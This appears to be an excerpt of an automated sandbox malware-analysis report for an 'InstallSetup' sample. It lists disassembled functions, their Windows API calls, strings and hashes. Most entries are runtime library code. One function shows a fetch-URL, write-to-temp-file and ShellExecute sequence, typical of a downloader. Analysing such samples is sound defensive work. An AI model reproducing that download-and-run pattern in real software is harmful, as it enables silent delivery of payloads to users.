___free_lconv_mon.LIBCMT ref: 0097A8A3

Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C0F
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C21
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C33
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C45
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C57
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C69
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C7B
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C8D
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979C9F
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979CB1
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979CC3
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979CD5
Part of subcall function 00979BF2: _free.LIBCMT ref: 00979CE7

_free.LIBCMT ref: 0097A898

Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9

_free.LIBCMT ref: 0097A8BA
_free.LIBCMT ref: 0097A8CF
_free.LIBCMT ref: 0097A8DA
_free.LIBCMT ref: 0097A8FC
_free.LIBCMT ref: 0097A90F
_free.LIBCMT ref: 0097A91D
_free.LIBCMT ref: 0097A928
_free.LIBCMT ref: 0097A960
_free.LIBCMT ref: 0097A967
_free.LIBCMT ref: 0097A984
_free.LIBCMT ref: 0097A99C

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: ffa8b59ed0275a3624d6c22090a71d0dd17ef718e1b2f63585bbacd7dc46bd22
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: 5A316B73604201EFEF20AB38D846B9AB3E8BF80350F11C46AE44DD7651DB75ADA0DB16

Function 0043A5F8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043A63C

Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 00942C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00942C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00942C94
GetTempPathW.KERNEL32(00000105,?), ref: 00942CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00942CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00942CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00942D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00942D58
ShellExecuteExW.SHELL32(?), ref: 00942DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 00942DE4

Strings

<, xrefs: 00942DAC

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: b44f93a89d5eb89f606ae34c83ae55a8e9f629bcad9cddb4a3d17aae4492a2a2
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: 20413C7190022DAEEB209F64DC85FEAB7BCFF05745F4081E9B549A2190DE709E858FA4

Function 0095EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0095F228,00000004,00957D87,00000004,00958069), ref: 0095EEF9
GetLastError.KERNEL32(?,0095F228,00000004,00957D87,00000004,00958069,?,00958799,?,00000008,0095800D,00000000,?,?,00000000,?), ref: 0095EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0095F228,00000004,00957D87,00000004,00958069,?,00958799,?,00000008,0095800D,00000000,?,?,00000000), ref: 0095EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0095EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF9D

Strings

advapi32.dll, xrefs: 0095EEF3, 0095EEF8, 0095EF14

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: 10e70c8c6998857a8012c7758401c717866c501f083c631b6daaf969a8c6d2c9
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: DC21A1B1904700BFDB10AFB59C49A5ABFACEF05B17F004A2AF941E3641CB7C85418BA4

Function 0095EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0095F228,00000004,00957D87,00000004,00958069), ref: 0095EEF9
GetLastError.KERNEL32(?,0095F228,00000004,00957D87,00000004,00958069,?,00958799,?,00000008,0095800D,00000000,?,?,00000000,?), ref: 0095EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0095F228,00000004,00957D87,00000004,00958069,?,00958799,?,00000008,0095800D,00000000,?,?,00000000), ref: 0095EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0095EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF9D

Strings

advapi32.dll, xrefs: 0095EEF3, 0095EEF8, 0095EF14

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 9866927aa501075179eb1e0a877042170eaa94963ed9babb884fdecc4c4eb435
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: 7821B2B1904700BFDB10AF759C49A5ABFECEF06B17F004A26F941D3641CB7C95418BA8

Function 009524A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0095670B), ref: 009524B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 009524C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 009524D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0095670B), ref: 00952500
GetProcAddress.KERNEL32(00000000), ref: 00952507
GetLastError.KERNEL32(?,?,?,0095670B), ref: 00952522
GetLastError.KERNEL32(?,?,?,0095670B), ref: 0095252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00952544
__CxxThrowException@8.LIBVCRUNTIME ref: 00952552

Strings

kernel32.dll, xrefs: 009524B0, 009524B5, 009524FA

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: d9fd071f1eb91216ad64917c9682db26b6bba66ce7444a1fd3b0928b8e55a6e1
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: 4E1182759003107FE711BB766C8AA6B7BAC9E46B137200526F801E3192FB78D90587A9

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

pContext, xrefs: 00424946
switchState, xrefs: 00424882

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 00960C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00960C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00960C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00960CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00960D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00960D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00960D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 00960D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00960D80
__CxxThrowException@8.LIBVCRUNTIME ref: 00960DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00960DBC

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: bf0178fc96d878d48994aa79f2afda9284cb4781768460af88f5c7bd21c9adc8
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: 2841C330A042089BCF14FFE4D4A67BE77A5AFC2300F1441A9E9465B2C3CB799E09C762

Function 0097204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00972061

Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9

_free.LIBCMT ref: 0097206D
_free.LIBCMT ref: 00972078
_free.LIBCMT ref: 00972083
_free.LIBCMT ref: 0097208E
_free.LIBCMT ref: 00972099
_free.LIBCMT ref: 009720A4
_free.LIBCMT ref: 009720AF
_free.LIBCMT ref: 009720BA
_free.LIBCMT ref: 009720C8

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 63f012cef65902624201e65791958279687843896eccf89b085fdbd155d0a5b6
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 661132B6620108BFCF45EF64C942E993BA5FF44350B51C1A5FA0C8F262DA71DA60AB90

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E25E, 0042E1CC, 0042E261
F(@, xrefs: 0042E229, 0042E1C0

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

pow, xrefs: 0043EFA9, 0043F055, 0043F068
sqrt, xrefs: 0043F049
log10, xrefs: 0043EF0F, 0043EF5F
acos, xrefs: 0043F03D
log, xrefs: 0043EF6B, 0043EF77
asin, xrefs: 0043F031
exp, xrefs: 0043EF8A, 0043EFEC

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 00973190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: d2feb1d21dd8b7d56b0cf618d03cc50ac4041afd4a38c0b9c203c3cf56bb0a92
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: 59C10376E04349AFCF16DFA8C841BADBBB4AF4A300F14C095E418A7392C7349A41DB61

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

csm, xrefs: 004287A6
fB, xrefs: 004287AE, 004287B7, 004287C8

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
PMDtoOffset.LIBCMT ref: 00428D4F

Strings

Bad dynamic_cast!, xrefs: 00428D91

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9

Function 0095C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0095C6DC
atomic_compare_exchange.LIBCONCRT ref: 0095C700
std::_Cnd_initX.LIBCPMT ref: 0095C711
std::_Cnd_initX.LIBCPMT ref: 0095C71F

Part of subcall function 00941370: __Mtx_unlock.LIBCPMT ref: 00941377

std::_Cnd_initX.LIBCPMT ref: 0095C72F

Part of subcall function 0095C3EF: __Cnd_broadcast.LIBCPMT ref: 0095C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0095C73D

Strings

t#D, xrefs: 0095C6C2

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: 781b1c826fe40f222943cd1c50dac4f63933c80709945443bd6016475d01d174
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: 7F01A2B6900605ABCB11FBB1CD86F9DB368AF84311F144151FD1497682EBB8AB198792

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
